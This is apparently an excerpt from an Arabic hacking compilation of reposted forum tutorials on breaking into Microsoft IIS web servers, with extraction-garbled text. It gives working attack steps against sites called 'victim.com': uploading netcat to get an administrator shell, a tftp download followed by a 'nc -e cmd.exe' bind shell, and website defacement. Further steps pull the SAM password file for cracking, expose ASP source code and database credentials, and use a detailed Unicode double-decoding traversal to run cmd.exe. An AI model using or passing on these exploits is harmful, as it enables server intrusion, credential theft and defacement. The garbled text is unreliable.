   ‫وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه‬
                                                                                             ‫العمليات‬
‫واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم ‪ IIS‬اال وهو ‪ Secure IIS‬من شركة ‪Eeye‬‬
 ‫والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع (( قبل حوالي اربعة اشهر )) كان ما يقارب 28%‬
                                                                     ‫من السيرفرات التي فيها نظام ‪IIS‬‬
                               ‫تحوي هذه الثغره وبدون ترقيع (( لعدم وجوده وقتها )) او ألهمال المدير.‬

                                              ‫انتهى،،،‬




                                                ‫841‬
               ‫" الدليل الكامل إلختراق سيرفر ‪" IIS‬‬

                                                                     ‫<منقول من منتديات شبكة الحزم>‬

                                                                              ‫<الكاتب:‪> DEMON‬‬

                                                                                            ‫---------‬
                                                                                            ‫مقدمة : -‬
                                                                                            ‫---------‬
   ‫يعلم الجميع مدى انتشار سيرفرات ‪ IIS‬حيث تشكل النسبة االكبر المستخدمة في تشغيل مواقع االنترنت ..‬
‫ويعلم الجميع مدى ضعف الناحية االمنية لهذه السيرفرات .. لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع‬
                                                                                 ‫توضيح كيفية عملها .‬

                                                                                   ‫---------‬
                                                                                  ‫مالحظة : -‬
                                                                                   ‫---------‬
‫معظم الطرق الموجودة هنا تعمل على سيرفرات 0.4‪ IIS‬و 0.5‪ IIS‬وجميعها تعتمد على البورت 20(( يعني‬
                                                                        ‫من خالل المتصفح)) .‬

                                                                             ‫-------------‬
                                                                              ‫المتطلبات : -‬
                                                                             ‫-------------‬
                ‫2- ‪ CGI-Scanner‬جيد .. أنا افضل( ‪ Whisker‬يمكنك تنزيله من هذا الموقع :‬
                                                            ‫) ‪www.wiretrip.net/rfp‬‬
 ‫6- اكتيف بيرل لتشغيل ملفات البيرل ( يمكنك تنزيله من الموقع : /‪http://www.activestate.com‬‬
                                                                                         ‫)‬
                                                  ‫3- ويب سيرفر (اي نوع) اباتشي او .. ‪IIS‬‬


                                                            ‫#########################‬
                                                            ‫#########################‬

                                                            ‫#########################‬



                                                                                ‫###########‬
                                                                            ‫# ‪#! Game Starts‬‬
                                                                                ‫###########‬


                                                                             ‫----------------‬
                                                                         ‫- : ‪IIS Hack.exe‬‬
                                                                             ‫----------------‬
‫اكتشف خبراء االمن في شركة ‪ eEye‬ثغرة امنية تسمح لك بتحميل نسخه ذكية من ‪ nc.exe‬وجعلها تنصت‬
                                                                             ‫على المنفذ 20 ..‬
                        ‫وهذا سيعطيك سطر اوامر ‪ cmde.exe‬مع امتيازات . ‪Administrator‬‬
  ‫بامكانك انزال ‪ NC.exe‬و ‪ IIS Hack.exe‬من الموقع . /‪http://www.technotronic.com‬‬
                                          ‫ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ..‬
  ‫قم بنسخ اداة ‪ nc.exe‬وضعها في الدليل الرئيسي للويب سيرفر لديك (في اباتشي )‪ Htdocs‬وفي ‪IIS‬‬


                                               ‫941‬
                                                                     ‫الدليل . ‪wwwroot‬‬
                                                          ‫ثم قم بتشغيل : ‪IISHack.exe‬‬
                    ‫‪c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe‬‬
                                                        ‫وبعد اتمام الخطوة السابقة بنجا ح :‬
                            ‫/‪c:\>nc http://www.target.com‬وستجد امامك ‪eGG SheLL‬‬

                      ‫مالحظة : تعمل هذه الثغرة على سيرفرات 0.4‪ IIS‬فقط ((اذا لم يتم تركيب الرقعه)) .‬

    ‫‪do you want me to explain what to do next, hey common you must be‬‬
                                                               ‫‪kidding‬‬
                                                            ‫....‪...hehe‬‬


                                                                                       ‫-----------------‬
                                                                                  ‫-: ‪MDAC = RDS‬‬
                                                                                       ‫-----------------‬
                          ‫اعتقد انها ثغرة قديمة قليال (لكني ما زلت ارى ان 2.% من المواقع تعاني منها ..‬
 ‫تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي .. سيتم تشغيل وامرك بصفتك مستخدم‬
 ‫‪SYSTEM‬اي بصالحيات مدير النظام .. على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة‬
                                                                                                  ‫ام ال ..‬
  ‫قم اوال باالتصال بالنظام الهدف 08 /‪ : c:\>nc -nw -w 2 http://www.host.com‬ثم قم بارسال‬
                                                       ‫االمر ‪: GET /msadc/msadcs.dll HTTP‬‬
            ‫فإذا كان الرد ‪ : application/x_varg‬فهذا يعني ان النظام مصاب (( اذا لم يتم ترقيعه )) ..‬
          ‫بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع : (( ‪www.wiretrip.net/rfp‬‬
                                                                     ‫‪mdac.pl - msadc2.pl )) v‬‬
                                                                    ‫‪c:\> mdac.pl -h host.com‬‬
   ‫‪Please type the NT commandline you want to run (cmd /c assumed):\n‬‬
                                                                                               ‫‪cmd /c‬‬
          ‫إذا اردت تغيير الصفحه الرئيسية ما عليك اال تنفيذ االمر > ‪: echo hacked by me hehe‬‬
                                                             ‫‪C:\inetpub\wwwroot\index.htm‬‬
         ‫وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل ‪ Hacker's Swiss knife Army‬اقصد‬
                                                                           ‫‪Nc.exe‬بواسطة هذا االمر :‬
        ‫‪%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r‬‬
                                                    ‫‪nc.exe&&nc.exe -l -p 80 -t -e cmd.exe‬‬
                                         ‫((قم بقراءة االمر من اليسار الى اليمين لتتمكن من قراءته جيدا ))‬
    ‫بعدها قم باالتصال بالنظام الهدف على المنفذ 20 وستجد سطر اوامر مع امتيازات . ‪Administrator‬‬


                                                                ‫--------------------------------------‬
                                                     ‫-: ‪Codebrws.asp & Showcode.asp‬‬
                                                                ‫--------------------------------------‬
‫الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتي مع ‪ IIS‬ولكنه ال يأتي محمل افتراضيا بل يجب على مدير النظام‬
                                                                                               ‫تفعيله ..‬
         ‫فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف(( ‪ .asp‬اعني رؤية‬
                                                                                            ‫المصدر)) .‬
                                ‫باستخدام هذا االمر ستحصل على ملف السام (( اذا كان النظام مصابا )) :‬
                      ‫_.‪http://www.victim.com/msadc/samples...nt/repair/sam‬‬
 ‫بعد الحصول على ملف السام .. ‪ Expand it & Crack it‬باستخدام االداة المفضلة لدي( 0.3‪ LC‬سيتم‬
                                                                        ‫كسرها في اقل من .6 ساعه ) .‬



                                                  ‫051‬
                                                                                      ‫--------------‬
                                                                                     ‫- : ‪Null.htw‬‬
                                                                                        ‫------------‬
               ‫عملية شر ح كيفية عمل هذه الثغرة معقد قليال .. لذا سأكتفي فقط بطريقة االستفادة منها ..‬
                                            ‫باختصار تسمح لك برؤية السورس كود الي ملف .. ‪ASP‬‬
           ‫لتنفيذ الثغرة : ‪http://www.victim.com/null.htw?CiWe...HiliteType=full‬‬
                              ‫سيعرض لك هذا الرابط السورس كود الخاص بالصفحه . ‪Default.asp‬‬


                                                                            ‫----------------------‬
                                                                      ‫- : ‪webhits.dll & .htw‬‬
                                                                            ‫----------------------‬
                ‫اوال قم بتجربة اللنك على النظام الهدف : ‪http://www.victim.com/blabla.htw‬‬
‫فإذا كان الرد بهذه العبارة ‪ : format of the QUERY_STRING is invalid‬فهذا يعني ان النظام‬
                                                                        ‫الهدف مصاب بنسبة 28% .‬
                                                              ‫اخيرا جرب تنفيذ الثغرة بهذه الطريقة :‬
                        ‫‪www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full‬‬
    ‫مع تغيير الـ ‪ XXXXX/XXXXX/XXXX/XXX.htw‬باحد هذه الملحقات , وبالتأكيد سيعمل احدها :‬
                                                ‫‪iissamples/issamples/oop/qfullhit.htw‬‬
                                             ‫‪iissamples/issamples/oop/qsumrhit.htw‬‬
                                                   ‫‪isssamples/exair/search/qfullhit.htw‬‬
                                               ‫‪isssamples/exair/search/qsumrhit.htw‬‬
                                      ‫وبالتالي ستحصل على ملف السام قم بكسره بواسطه االداة .. 3‪LC‬‬


                                                ‫------------------------------------------------‬
                                       ‫-: ‪[ASP Alternate Data Streams [::$DATA‬‬
                                                ‫------------------------------------------------‬
  ‫هذه الثغرة كانت بدايتها منذ العام 0882 .. وهي مخصصة بالتحديد لسيرفرات 0.3‪ IIS‬واالن تعمل على‬
                                                                       ‫بعض سيرفرات .. 0.4‪IIS‬‬
   ‫ومهمتها عرض السورس كود الي صفحه (( البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ))‬
‫االجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل ‪Global.asa‬‬

                                                  ‫يمكن تنفيذ الثغرة من المتصفح بواسطة هذا األمر‬
                                        ‫‪http://www.victim.com/default.asp::$DATA‬‬


                                                                           ‫------------------‬
                                                                        ‫- : ‪ASP dot bug‬‬
                                                                           ‫------------------‬
   ‫ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه ..‬
                                                             ‫حيث تم اكتشافها في العام 1882 ..‬
                                                          ‫ويتم تنفيذها من المتصفح بهذا الشكل :‬
              ‫‪.http://www.victim.com/sample.asp‬الحظ النقطة الموجودة في اخر السطر‬
                                                        ‫وهي فقط تعمل على سيرفرات . 0.3‪IIS‬‬


                                                             ‫------------------------------------‬
                                                          ‫- : ‪ISM.DLL Buffer Truncation‬‬


                                              ‫151‬
                                                                 ‫------------------------------------‬
                                 ‫خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ..‬
‫وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما .. وفي الحقيقة نحن نقوم بطلب ملف‬
                                                                                                  ‫اخر ..‬
    ‫الملف المسؤوول عن هذا الخطأ هو ‪ ISM.dll‬حيث يتم تحميله بعدد كبير من الرموز المسافة (%26 )‬
                                                                                           ‫. ‪Space‬‬
                                                                         ‫يمكن تنفيذ الثغرة بهذا الشكل :‬
                ‫‪http://www.victim.com/global.asa%20(...<=230)global.asa.htr‬‬
                                          ‫مكان الـ 236= >نقوم بوضع 236 مسافة بهذا الشكل 26% ..‬
 ‫هذا الخطأ يعمل على سيرفرات .. 0.5&0.4 ‪ IIS‬ولكن ال يمكن تجربتها على السيرفر اكثر من مره اال اذا‬
         ‫قام بتسجيل خروج وتسجيل دخول , ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف‬
     ‫‪ISM.dll‬عن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل .. لذا يجب اعادة‬
  ‫تحميل الملف في الذاكرة مره اخرى .. اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل‬
                                                                  ‫‪Rebot‬او . ‪Logout & Login‬‬


                                                                                     ‫----------‬
                                                                                      ‫-: ‪+.htr‬‬
                                                                                      ‫---------‬
                                          ‫هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات . ‪ASP‬‬
                                                                   ‫يمكن استخدامها بهذا الشكل :‬
                                             ‫‪http://www.victim.com/global.asa+.htr‬‬


                                                                            ‫-------------‬
                                                                          ‫- : ‪site.csc‬‬
                                                                             ‫------------‬
‫تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ ‪ DNS‬الخاص بالموقع بما في ذلك ‪DSN, UID and‬‬
                                                                ‫.. ‪PASS Database‬‬
                 ‫الثغرة : ‪http://www.victim.com/adsamples/config/site.csc‬‬
              ‫سيقوم المهاجم بانزال الملف المذكور .. وسيحصل على معلومات قيمة و هامة أيضا .‬

                                               ‫انتهى،،،‬




                                                ‫251‬
                ‫"دراسة مفصلة وبعمق في الـ‪"UniCode‬‬

                                                                            ‫<منقول من منتدى إعصار>‬

                                                                             ‫<الكاتب: ‪>Dark Devil‬‬

                                                                     ‫السالم عليكم ورحمه هللا و بركاته ::‬
                                                       ‫ازيكم شباب ايه اخباركم كلكم ؟ اتمنى تكونوا بخيرو.‬
                                         ‫اعذرونى على غيبتى و انقطاعى عنكم و لكن و هللا ظروف رهيبه‬
                                                 ‫و االن خلونا نرغى فى شويه كالم فاضى على رأى بروكن‬
  ‫كنت اتصفح االنترنت و ادعبث شوى و بعدين جمعت بعض من المعلومات من ملفات مختلفه و هى تتحدث‬
 ‫عن اليونى كود (طبعا االن معظمكم سيستعجل و يقول ياه ه ه ه ه يونى كود قديمه ....الخ ) و لكن انا اقوله‬
  ‫اصبر لقد ذكرت اليونى كود فى المنتديات ثالث مرات مره عن الصديق بالك هنتر و مره من االخ هكس و‬
    ‫مره عن الصديق ديمون او ابو خلود لكن هذه المره صدقونى ستكون مختلفه تمام االختالف عن المرات‬
                                                                                  ‫السابقه) ‪(Trust Me‬‬
                                        ‫و االن دعونا من ها الخرابيط و خلونا نقول الدرس يمكن يعجبكم::‬

                                                                                     ‫اوال:‬
                                                                                   ‫====‬
                                                                     ‫متى وجدت اليونى كود؟‬
                                                  ‫‪Found On 15 May 2001 BY NSFOCUS‬‬

                                                                  ‫السيستيمز التى تتأثر بالثغره هى::‬
                                                       ‫‪All running IIS 4 / IIS 5 web server‬‬
                                                                                  ‫‪Windows 2k‬‬
                                                                  ‫2‪Windows 2k SP1 + SP‬‬

‫ثغره اليونى كود ::هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصالحيه مسمو ح بها (اى يكون‬
                                                ‫له امتياز) ‪IUSR_machinename account‬‬

‫و تحدث هذه الثغره اصال نتيجه ان روتين ال ‪ cgi‬الموجود على الويب سرفر نفسه يفك شفره عنوان الموقع‬
                                    ‫مرتين و هذا ما نسميه بال( ‪ DeCode‬ال تقلق ستفهم بعد ذلك )‬

                                           ‫تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى‬

                                                                     ‫و ليكن مثال ::‬
         ‫>=== ‪http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c‬ثغره يونى كود‬

               ‫>==== /‪http://iisserver‬سيكون هذا هو هدفنا اى الموقع المصاب بالثغره المذكروه‬

‫- /‪* /scripts‬و هذا الفولدر لديه امتيازات تنفيذيه على السرفر (اى يمكن لليوزر تنفيذ اى امر على الوب‬
‫سرفر من خالله ) وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال ‪ cgi‬الموجوده على الوب سرفر و‬
                         ‫بالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى) ‪executable directory‬‬

 ‫و طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم ‪ iis‬و‬
          ‫ملحوظه هامه:: ال يوجد على كل ملقم ‪ iis‬هذا الفولدرالتنفيذى اى ‪executable directory‬‬

‫و اعتقد ان الصديق بالك هنتر و االخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم (فأنا اريد ان‬
                                                  ‫اربط الدروس مع بعض حتى تكون سلسله متكامله )‬



                                                 ‫351‬
     ‫>=== ‪* winnt/system32/cmd.exe‬و طبعا هذا هو ال ‪ cmd‬الذى يسمح لنا بأدراج سطور‬
       ‫االوامر التى نريد تنفيذها (و على فكره ممكن تستعمل هذا ال ‪ cmd‬فى استخدام اوامر مثل ‪ ping‬و‬
                               ‫‪netstat‬و.... ‪ traceroute‬الخ اعتقد انها فكره لم يالحظها بعضنا )‬

‫*؟- عالمه االستفهام تخيلو حتى عالمه االستفهام فى هذه الثغره لها دور فهذه العالمه تعنى الحاله التى ينفذ‬
      ‫بها االمر (طبعا مش فاهم يعنى ايه ) و ال يهمك تعالى معى افهمك يعنى ايه عالمه االستفهام تعنى كلمه‬
     ‫‪argument‬و هذه الكلمه هى التى تعنى الحاله التى سينفذ بها االمر اى انه امر مثال ينفذ فى لحظه ثم‬
        ‫ينتهى مثل ‪ copy‬مثال ام انه امر مثال ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم االوامر التى‬
‫نستخدمها هى االوامر العاديه و هى من نوع ‪ argument /c‬و هذا ال ‪ /c‬يعنى ان االمر ينفذ فى لحظه ثم‬
                                                                                                   ‫ينتهى‬
  ‫تعالى افهمك اكثر :: لو عندك ويندوز 2226 افتح ال ‪ cmd‬بتاعك و اكتب هذا )?/ ‪ (cmd‬و اضغط انتر‬
                  ‫,سيظهر لك كالم كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى‬
                                                                            ‫شوف ايه الى را ح يظهر لك::‬
             ‫‪Starts a new instance of the Windows 2000 command interpreter‬‬

   ‫]‪CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF‬‬
                                                          ‫]‪[[/S] [/C | /K] string‬‬
     ‫‪/C Carries out the command specified by string and then terminates‬‬
              ‫‪/K Carries out the command specified by string but remains‬‬
               ‫)‪/S Modifies the treatment of string after /C or /K (see below‬‬
                                                             ‫‪/Q Turns echo off‬‬
   ‫)‪/D Disable execution of AutoRun commands from registry (see below‬‬

                ‫هذا جزء بسيط جداا مما را ح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اوال يقولك ::‬
      ‫‪Starts a new instance of the Windows 2000 command interpreter‬و هذه‬
      ‫الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز 2226 و هذا طبعا وضح لنا ان كل ‪cmd‬‬
               ‫يمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق ال . ‪arguments‬و بعدها يظهر لنا‬
        ‫‪arguments‬كثيره و منها الذى نستعمله دائما فى الثغره و هو ‪ /c‬شوفو كده ما المكتوب امامه ::‬
     ‫‪Carries out the command specified by string and then terminates‬و هذا‬
         ‫الكالم معناه انه ينفذ االمر الموجود فى سطر االوامر ثم ينتهى و طبعا هذا لالوامر العاديه التى نعرفها‬
‫تعالو نشوف السطر الى تحتيه ::سوف نجد انه يتكلم عن ‪ argument‬ال نراه فى ثغره اليونى كود و هو ال‬
                                                                               ‫‪/k‬شوفو ايه مكتوب امامه::‬
 ‫‪Carries out the command specified by string but remains‬و طبعا معناه انه ينفذ‬
       ‫االوامر الموجوده فى السطر و لكن يستمر مفعولها (ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو‬
                   ‫مكتوب امامى و لكن تقدر تقول انها االوامر التى تأخذ فتره طويله حبتين مثل ‪ ping‬مثال )‬
    ‫و مثال هناك ‪ argument‬أخر مثل ‪ /Q‬و هذا نستخدمه فى اغالق تفعيل امر ‪ echo‬كما هو واضح فى‬
                                                                                               ‫المثال فوق‬
    ‫و هناك الكثير من هذه ال ‪ arguments‬و طبعا منها ما هو اساسى ال يمكنك التحكم فيه (يعنى فتحه او‬
   ‫غلقه مثل ال ‪ /c‬و ال ) ‪ /k‬و هناك اخرين يمكنك ان تجعلهم ‪ on‬او ‪ off‬و بهذا تكون انت تتحكم بحاله ال‬
        ‫‪cmd‬خاصتك (ياريت تنفذ االمر و تقرأ المكتوب النك را ح تالقى تفاصيل الفتح و الغلق بالتفصيل ) و‬
   ‫اصبروا على قليال حتى انتهى من االمتحان االول فى ‪ MCSE‬فى خالل اسبوعين ان شاء هللا تعالى و بعد‬
                           ‫ذلك نعود اكثر قوه و نشر ح لكم هذه النقطه بالتفصيل ان شاء هللا بس اصبرو شوى‬
‫اعتقد انك االن فهمت ما هى ال ‪ arguments‬و ما فائده ‪ /c‬التى تكتبها فى الثغره و انا متأكد انك ال تعرف‬
                                                                                                   ‫معناها .‬
‫تعالو نرو ح لنقطه سهله و بسيطه جدااا فى الثغره ,انت تشغل ال ‪ cmd.exe‬النك تريد ان تتحكم بالموقع و‬
                              ‫تغير االندكس و الخ و و لكن تعالى مثال نشغل اى ملف تانى ياترى كيف نشغله ؟‬
             ‫انا را ح اقلك كيف ::كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكل‬
                    ‫‪Ping.exe+PRINT‬بال من ‪ cmd.exe?/c‬و بهذا تكون قد شغلت الفايل الذى تريده‬
                                                         ‫. ) ‪(enjoy this‬حيث تصبح الثغره بهذا الشكل ::‬
                                   ‫‪http://issserver/scripts/..%5c..%.../ping.exe+PRINT‬‬


                                                  ‫451‬
‫- +‪* /c‬و بالتالى كما عرفنا فوق انا ‪ /c‬هى ال ‪ argument‬لل ‪cmd.exe‬او الحاله التى سينفذ عليها ال‬
   ‫‪cmd‬االمر اما عالمه ال + التى بجانب ال ‪ /c‬فهى بمقام المسافه بين الكلمتين فى الثغره و لكن ال يمكننا‬
  ‫اسبدالها بمسافه عاديه و بعدها يكون االمر الذى يحمله سطر االوامر لينفده ثم عالمه + ثانيه و بعدها اسم‬
                                                        ‫الدرايف الذى تعرض محتوياته على الشاشه حاليا .‬

  ‫**و نأتى االن الهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكالم (هو ان سبب الثغره‬
 ‫يكون حل شفره العنوان اكثر من مره )و هذا ما نطلق عليه ال ‪decode‬و انا شخصيا افصل الديكودز على‬
    ‫انه تحليل حتى نصل البسط الحل كما فى الرياضيات يعنى ‪ simplyfiey‬اى تبسيط و فك المعادله تعالو‬
                                                               ‫خلينا نفهمكم هذا على الثغره نفسها ::‬

                                           ‫‪/..%255c..%255c‬هذا هو الديكود اى التحليل لالصل /....‬
                                                   ‫ولكن ما الذى نحاول ان نفعله بهذه التحليالت الغريبه ؟‬
     ‫فنحن بذلك نحاول ان نحسن و نلعب فى مسارات الديريكتورز و لكن لالسف ال يمكنك تغيير او اللعب فى‬
  ‫الديريكتورز الن ال ‪ iis‬مزود بخاصيه عمل ‪ check‬على مثل هذه الديكودز و منعها من التنفيذ و هنا يقع‬
     ‫اصل ثغره اليونى كود و هو التحليل لمرتين او الكثر من مره فهمتم قصدى االن اى ان ال ‪iis‬مزود فعال‬
‫بخاصيه ال ‪ check‬على هذه الديكودز و لكن انت تضع الثغره و بها اكثر من تحليل واحد لنفس اسم الموقع‬
  ‫و لذلك يقوم ال ‪ iis‬بوظيفته المعتاده و هى ال ‪ check‬و المنع على الديكود االول و يظهر له ان كل شئ‬
       ‫بخير و انه يسيطر على الموقف خخخخخخخخ و لكن الحقسقه انه يعمل ال ‪check‬مره واحده فتكون‬
 ‫النتيجه ان الديكود الثانى ينجح تماما فى محاوله اللعب فى الديريكتورز و بالتالى يكون نتيجه الديكود الثانى‬
                                                                   ‫هو ان يرجع الى اصله اى) ‪/ (slash‬‬

                           ‫و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها ::‬
   ‫شوفو فيه ماده اسمها ‪ computer logic‬و الماده دى را ح درس فيها شئ يسمى ‪HexaDecimal‬‬
   ‫‪Values‬و هذه ال ‪ values‬هى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه‬
                              ‫مثل / فى الكمبيوتر لها ما يسمى بال ‪ hex value‬تعالى اوضحلك اكثر ::‬
                                                                   ‫مثال: %26 تعنى مسافه)‪(space‬‬
      ‫هذا مثال بسيط و اعتقد انك فهمت االن كالمى و طبعا يوجد جدول لهذه ال ‪ hex values‬المساويه‬
     ‫للحروف و الحركات العاديه فى الكمبيوتر , اذن اعتقد انك ادركت تماما االن انك ترسل ‪hex values‬‬
      ‫عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او‬
                                                                                       ‫ال ‪decode‬‬

   ‫تعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشر ح عليها هى ال ) ‪ / (slash‬حيث انها من‬
                                                                     ‫اساسيات الديكود فى هذه الثغره ::‬
 ‫شوف فى جدول ال ‪ hex value‬را ح نجد ان ال / = %5 , ‪c‬طبعا هذا هو الديكود االول الذى ستفكر االن‬
    ‫فى انك تحذف ال / و تضع بدال منها هذا ال ‪value‬فتنجح الثغره و لكن انا اقول لك هذا خطأ الن هذا هو‬
‫الديقود االول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود االول فستجد ان‬
‫ال ‪ iis‬لديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال ‪ value‬حتى‬
                                                                         ‫يتم الديكود التانى فتنجح الثغره‬

                                    ‫و بالنظر الى جدول ال ‪ hexadecimal values‬شوف نجد هذا ::‬
                                                                              ‫52% = %‬
                                                                              ‫53% = 5‬
                                                                              ‫36% = ‪c‬‬

 ‫و بالتالى نجد انفسنا قد خدعنا ال ‪ iis checker‬بأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابل‬
                                                   ‫على االصل و هو / و بالتالى تكون قد نجحت الثغره .‬

      ‫فهمتم االن شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار‬
 ‫التحليل االول مرتين و لكن معناه تحليل و فك التحليل االول اى ‪ simplify‬الى ابسط و اطول صوره ممكنه‬


                                                 ‫551‬
                                                                                      ‫فى نفس الوقت‬

                                    ‫و عشان توضح اكثر معك را ح احطلك كيف التركيبه الصح للتحليل ::‬
                                                      ‫‪%255c %25 = % 5 = 5 c = c = %5c‬‬
                                                    ‫‪%%35c % = % %35 = 5 c = c = %5c‬‬
                                            ‫‪%%35%63 % = % %35 = 5 %63 = c = %5c‬‬
                                     ‫‪%25%35%63 %25 = % %35 = 5 %63 = c = %5c‬‬

                                                                                      ‫ثم : %5/= ‪c‬‬

‫ارائيتم التحليل طبعا فى االخر يجب ان يساوى الديكود االصل و هو كما واضح فى مثالنا كل التحليالت تساوى‬
         ‫%5 ‪c‬و كما ذكرنا / = ‪ %5c‬و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال ‪iis‬‬
                                                                                       ‫. ‪checker‬‬
                                      ‫و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض‬
                                                                  ‫سوف نضع الثغره فى هذا الشكل ::‬
                                 ‫‪http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s‬‬

      ‫و ستدخلون على الموقع بنجا ح و لكن اكيد تالحظون شئ جديد قد زاد على الثغره و هذا الشى هو‪+/s‬‬
                                                                                         ‫هذا الرمز‬
      ‫و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فى‬
                                                                               ‫كمبيوتر الويب سرفر‬

    ‫و هللا تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل‬
      ‫االخوه و ان شاء هللا انتظرو موضوعى القادم بعدما اكون انهيت امتحانى االول فى( ‪ MCSE‬ادعولى‬
     ‫بالنجا ح ) و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز 2226 و كيفيه اختراقها و فائده ال‬
                                                              ‫‪.WIN2000 RESOURCE KIT‬‬

                                              ‫انتهى،،،‬




                                               ‫651‬
   ‫" تدريب على عملية اإلختراق بواسطة اليونيكود "‬

                                                                               ‫<الكاتب: ماكس هاك >‬

                                                                              ‫بسم هللا الرحمن الرحيم..‬

  ‫كثر الكالم عن إختراق المواقع بأنواعه واليوم عندي شر ح عن اإلختراق عن طريق اليونيكود أو باألصح‬
   ‫تطبيق عملي على كيفية اإلختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن هللا‬
                                                                 ‫سيوصلهم إلى طريق اإلحتراف.....‬
                                                                             ‫******************‬
                                                                                    ‫بسم هللا نبدأ...‬
     ‫سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع‬
                                                                                        ‫مصاب.....‬

‫لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز2226 على جهازك . وفي نفس السيدي تبع النظام‬
                                                             ‫تقوم بإضافة سيرفر ‪ IIS‬وذلك عن طريق :‬
                                                                       ‫2 *قم بالذهاب إلى لوحة التحكم.‬
                                                                  ‫6 *قم بالنقر على إضافة إزالة برامج.‬
                                                ‫3 *قم بالنقر على زر " إضافة إزالة مكونات ويندوز ".‬
                                                     ‫. *قم بوضع عالمة صح على الخيار األول.”‪“IIS‬‬
                                                                    ‫هذا بالنسبة لكيفية تنزيل السيرفر..‬
                                             ‫اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي:ـ‬
  ‫قم بوضع الموقع في مجلد ‪ wwwroot‬الموجود داخل مجلد ‪ Inetpub‬طبعا هتدخل عليه بعد ما تشغل‬
                                                                                ‫السيرفر ‪ IIS‬عن طريق‬
                                                                                 ‫/10.0.721//:‪http‬‬
  ‫وإليجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن‬
                           ‫الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو/1.0.0.721//:‪http‬‬
                             ‫وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود.‬

                                              ‫انتهى،،،‬




    ‫" شرح مفصل لكيفية اختراق المواقع المجانية "‬


                                               ‫751‬
                                                                         ‫<منقول من منتدى إعصار>‬

                                                                       ‫<الكاتب:‪> De\/iL Ni9hT‬‬


                                                               ‫=-سهوله اختراق المواقع المجانيه=-‬

                                                                  ‫نعم,,,ان اختراقها اسهل مماتتصور‬

          ‫االساسيات الختراق كل شي هو الكوكيز النه يحتوي على جميع المعلومات((الموقع,,ايميل,,الخ))‬

                                         ‫ولكن يجب ان تعرف عده نقاط مهمه الختراق اي موقع مجاني‬

                                                                                             ‫اوال=-‬

                                                            ‫يجب عليك معرفه نوعيه اصدار المتصفح‬

